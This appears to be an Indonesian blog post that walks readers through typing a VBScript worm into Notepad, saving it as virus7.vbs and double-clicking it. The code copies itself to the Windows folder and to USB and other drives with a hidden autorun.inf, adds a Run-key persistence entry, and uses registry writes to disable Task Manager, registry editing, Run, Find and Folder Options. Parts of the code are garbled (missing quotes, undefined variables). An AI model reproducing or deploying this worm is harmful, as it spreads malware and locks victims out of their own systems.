1. kita buka notepad (Start > All Programs > Accessories > Notepad)
2. coba tulis/copy rumus di bawah ini!:
on error resume next
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd
isi = [autorun] & vbcrlf & shellexecute=wscript.exe bLaCk_eNgInE.dll.vbs
set fs = createobject(Scripting.FileSystemObject)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & \batch- bLaCk_eNgInE.dll.vbs )
tf.attributes = 32
set tf=fs.createtextfile(windowpath & \batch- bLaCk_eNgInE.dll.vbs,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & \batch- bLaCk_eNgInE.dll.vbs )
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> A: then
set tf=fs.getfile(flashdrive.path &\bLaCk_eNgInE.dll.vbs )
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &\bLaCk_eNgInE.dll.vbs ,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &\bLaCk_eNgInE.dll.vbs )
tf.attributes = 39
set tf =fs.getfile(flashdrive.path &\autorun.inf)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &\autorun.inf,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &\autorun.inf)
tf.attributes=39
end if
next
set qalby = createobject(WScript.Shell)
//Manip - Ubah Title Internet Explorer menjadi bLaCk_eNgInE//
dhisya.regwrite HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title, THE KALONG v.s. ZAY
dhisya.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\Explorer\Advanced\Hidden, 0, REG_DWORD
dhisya.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\Explorer\NoFind, 1, REG_DWORD
dhisya.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\Explorer\NoFolderOptions, 1, REG_DWORD
dhisya.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\Explorer\NoRun, 1, REG_DWORD
dhisya.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\System\DisableRegistryTools, 1, REG_DWORD
dhisya.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\System\DisableTaskMgr, 1, REG_DWORD
dhisya.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\Explorer\NoViewContextMenu, 1, REG_DWORD
dhisya.regwrite HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion \Winlogon\LegalNoticeCaption, Worm Qalby. Variant from Qalby, dont panic all data are safe.
dhisya.regwrite HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion \Run\Systemdir, windowpath & \batch- k4l0n6.dll.vbs
dhisya.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization, The Batrix
dhisya.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner,Qalby
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(Wscript.shell)
sd.run windowpath & \explorer.exe /e,/select, & Wscript.ScriptFullname
3. sekarang simpan File > Save As..( Pada bagian "File name" tulis virus7.vbs dan "Save as type" pilih All Files )
belum faham juga?. Duh cape dh, dasar Pentium 1(hehehe...just kidding), coba lihat gambar dibawah ini:
sekarang klik "Save" deh!. Selesai deh, coba jalankan viris ini dengan cara mendouble click pada file virus7 ini!, apa yang terjadi?. Rasakan aja sendiri. Hehe...
Wass.
Postingan
0 komentar:
Posting Komentar